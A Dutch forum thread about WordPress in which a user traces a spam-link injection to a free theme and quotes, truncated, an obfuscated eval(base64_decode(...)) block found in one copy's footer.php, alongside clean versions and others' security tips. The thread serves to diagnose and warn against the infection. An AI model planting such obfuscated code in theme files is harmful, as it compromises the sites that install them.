Acties:
  • 0 Henk 'm!

• YopY
  • Registratie: September 2003
  • Laatst online: 13-07 01:14
Voor m'n blog willen we binnenkort een overhaul doen van de voorkant, deze keer dus met widget support en betere navigatie, aangezien de hoeveelheid links nogal groot wordt. We gaan het meer CMS-achtig inrichten. We kunnen er ook nog voor kiezen om naar een echt CMS over te gaan... maar er is gewoon heel veel keuze daarin, en ik ben bang dat de zaak overzetten (ook qua links) gewoon heel erg veel werk gaat worden.

Maar nu dus een dilemma: baseren we het op de twentyeleven stijl van vorig jaar, of wachten we nog een paar weken op twentytwelve?

Acties:
  • 0 Henk 'm!

• Alfa Novanta
  • Registratie: Oktober 2001
  • Laatst online: 14-09 00:17

Alfa Novanta

VRRROOOAAARRRP

Zo, heb ik net een paar weken een Wordpress site in de lucht .. en nu Google hem éénmaal in zijn index heeft opgenomen blijk ik slachtoffer te zijn geworden van een hack! }:|

Gisteren e.e.a. uit lopen pluizen, maar volgens mij is het dees ...
http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/

Helemaal bovenaan zie je een link staan naar 'colon cleansing' .. jawel .. :')

Ik heb alle files gecontroleerd, maar die lijken ongewijzigd, wat door de timestamps bevestigd lijkt.
Vervolgens heb ik de database maar eens gedownload en geopend met een teksteditor en op een bepaalde regel stond inderdaad deze link met nog wat zut er omheen.

Goed, de regel aangepast en de database teruggezet en dan maar even aankijken hoe snel ze er weer bij zijn nou? Nou mooi dan, want hij staat er 12 uur later inmiddels alweer op :r

Wat ik lees op internet is het vrij simpel .. je zoekt met Google op een bepaalde Wordpress versie en alle standaard-sites komen naar voren tenzij je alle info uit de Meta-tags hebt gestript. Dat is toch geen porum zo?

Ik gebruik de nieuwste Wordpress versie, 3.3.1
ik heb deze theme als basis gebruikt ..
Afbeeldingslocatie: http://www.wordpresstemplates.com/wp-content/uploads/screenshot115.png
van http://www.wordpresstemplates.com/mouse-it/

grmpf .. deze theme is sinds 2008 niet echt meer ge-update. Hoe link zou dat zijn?

Welke maatregelen treffen jullie om je site te beveiligen?

My Youtube channel: Alfa Novanta
AMD Ryzen 7 5800X | ASRock X470 Taichi | 32GB Kingston HyperX Predator DDR4-3200 RGB | Gigabyte RTX3090 Gaming OC 24GB GDDR6 | Windows 10 x64 | HP Reverb G2

Acties:
  • 0 Henk 'm!

• Coach4All
  • Nu online

Coach4All

I'm a Coach 4 All

ing._Buttje schreef op woensdag 07 maart 2012 @ 13:35:

Welke maatregelen treffen jullie om je site te beveiligen?
Alleen plugins installeren die je gebruikt, bij voorkeur een template gebruiken die met enige regelmaat een update krijgt.
Templates die je niet gebruikt verwijderen en de gebruikers geen keuze geven zelf een template te kiezen.

--- Systeembeheerdersdag --- Voedselintolerantie ---

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Je link is van 2008, dus je zou zeggen dat Wordpress dat inmiddels gepatched heeft in de recenste versie van Wordpress...

Het zou erg makkelijk zijn als websites zo gehacked kunnen worden, dat had al groot nieuws geworden...

Acties:
  • 0 Henk 'm!

• Alfa Novanta

Alfa Novanta

VRRROOOAAARRRP

TheNephilim schreef op woensdag 07 maart 2012 @ 13:54:
Je link is van 2008, dus je zou zeggen dat Wordpress dat inmiddels gepatched heeft in de recenste versie van Wordpress...

Het zou erg makkelijk zijn als websites zo gehacked kunnen worden, dat had al groot nieuws geworden...
Klopt, het is een oud artikel. De punten die men aan haalt lijken bij mij ook niet van toepassing, behalve dan dat de malicious code in de db staat. Het stukje lijkt ook te kloppen dat de link eerst hidden is, maar tevoorschijn komt zodra de Google crawlerbot voorbij komt.

Ik gebruik mijn wordpress als eenvoudige website met een paar plug-ins,
  • Akismet (standaard plug-in)
  • Contact Form 7 (hmm .. zonder captchá!) :/
  • Google Analytics Dashboard
  • Hello Dolly (standaard plug-in)
  • Slideshow Gallery (hele gave slideshow!)
  • WassUp (bezoekers statistieken)
en sinds nu,
  • Exploit Scanner
  • WordPress File Monitor Plus
Ik overweeg helemaal opnieuw te beginnen. De source/html van mijn pages heb ik wel, dus ik kan hem relatief snel opnieuw opzetten.

De stappen die ik nu overweeg ..
  1. de db verwijderen
  2. wp eraf gooien
  3. van de standaard install alle files doorzoeken op 'Wordpress' en vervangen door 'ga weg'
  4. deze aangepaste install installeren
  5. de tables niet met wp_ laten beginnen
  6. de mouseit theme ook van Wordpress tags ontdoen
  7. de mouseit theme installeren
.. en dan komen de plug-in's .. :/

[ Voor 29% gewijzigd door Alfa Novanta op 07-03-2012 14:11 ]

AMD Ryzen 7 5800X | ASRock X470 Taichi | 32GB Kingston HyperX Predator DDR4-3200 RGB | Gigabyte RTX3090 Gaming OC 24GB GDDR6 | Windows 10 x64 | HP Reverb G2

Acties:
  • 0 Henk 'm!

• Alfa Novanta

Alfa Novanta

VRRROOOAAARRRP

Nou, toch nog anders gedaan. Eerst de theme maar eens beter onder de loep genomen. Om dat goed te kunnen doen heb ik de theme nogmaals op internet gezocht en van 3 of 4 verschillende bronnen gedownload. De Readme.txt was overal hetzelfde qua versie enzo, maar de inhoud verder verschilde wel eens een bestandje of 1 of 2 .. O-)

voorbeeld, mijn versie had extra:
  • theme_licence.php
  • license.txt
  • start_template.php
De inhoud van de license was allemaal abracadabra, maar als het om een license gaat, vind ik dat niet direct vreemd, maargoed, ik vond nu een versie zonder license geneuzel en die doet het ook :P

Ook de grootte verschilde soms, want allemaal hadden ze
  • footer.php
Zoals hij standaard was:
code:
1
2
3
4
5
6
7
8
9
10
</div></div>
<div id="footer">
<a href="http://www.alertswift.com/">Web Monitoring Service</a>
        &copy; <?php echo date("Y");?> - <?php bloginfo('name'); ?>.<br/>
        <!-- Start -->Wordpress themes<!-- End --> 
        <?php wp_footer(); ?>
</div>
</div>
</body>
</html>

hoe een andere was ..

code:
1
2
3
4
5
6
7
<?php eval(base64_decode('Pz4gPC9kaXY+PC9kaXY+DQo8ZGl2IGlkPSJmb290ZXIiPg0KCQkm
Y29weTsgPD9waHAgZWNobyBkYXRlKCJZIik7Pz4gLSA8P3BocCBibG9naW5mbygnbmFtZScp
...
<knipperdeknip>
...
OyA/Pi48YnIvPg0KCQk8P3BocCBpZihpc19mcm9udF9wYWl2Pg0KPC9ib2R5Pg0KPC9odG1
sPg0KIDw/'));?>

:')

en mijn huidige versie
code:
1
2
3
4
5
6
7
8
</div></div>
<div id="footer">
        &copy; <?php echo date("Y");?><br/>
        <?php wp_footer(); ?>
</div>
</div>
</body>
</html>

;)

Database weer gestript van de colon-spam en teruggezet. Nu maar weer afwachten ..

Acties:
  • 0 Henk 'm!

• wjzijderveld
  • Registratie: Augustus 2005
  • Laatst online: 23-08 10:55
ing._Buttje schreef op donderdag 08 maart 2012 @ 00:07:hoe een andere was ..

code:
1
2
3
4
5
6
7
<?php eval(base64_decode('Pz4gPC9kaXY+PC9kaXY+DQo8ZGl2IGlkPSJmb290ZXIiPg0KCQkm
Y29weTsgPD9waHAgZWNobyBkYXRlKCJZIik7Pz4gLSA8P3BocCBibG9naW5mbygnbmFtZScp
...
<knipperdeknip>
...
OyA/Pi48YnIvPg0KCQk8P3BocCBpZihpc19mcm9udF9wYWl2Pg0KPC9ib2R5Pg0KPC9odG1
sPg0KIDw/'));?>
Gezocht op gratis templates? http://wpmu.org/why-you-s...-google-or-anywhere-else/

Canon EOS60D | Canon 100mm f/2.8 USM | Canon 100-400mm f/4.5-5-6L | Canon 10-22mm f/3.5-4.5 USM | Canon 430EX II

Acties:
  • 0 Henk 'm!

• Alfa Novanta

Alfa Novanta

VRRROOOAAARRRP

tuurlijk, wie niet? *O*

Acties:
  • 0 Henk 'm!

Verwijderd

wat zijn nu goede sites voor themes.

als je met free in je search googled dan krijg je echt een shitload aan hits en er zit echt veel bagger tussen.

Acties:
  • 0 Henk 'm!

Verwijderd

van de OP:
Still to come:
- Betrouwbare externe bronnen van themes en plugins
- Premium themes en plugins
- Showcase van grote websites en weblogs aangedreven door WordPress
- Concurrentie van andere (open source) content management systems
- Inhoudsopgave toevoegen

misschien een idee om alvast een paar categorien te maken die mensen veel gebruiken en daarin bijvoorbeeld de beste plugins?

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Yup, dat zou handig zijn inderdaad!

Vergeet overigens niet dat op wp.org ook genoeg te vinden is: http://wordpress.org/extend/themes/
Pagina: 1 ... 5 ... 9 Laatste

Let op:
~[html]Dit topic is niet de plaats om te lopen helpdesken. Het WordPress topic is primair bedoeld als discussieplatform, niet als vraagbaak en quickfix desk.~[/html]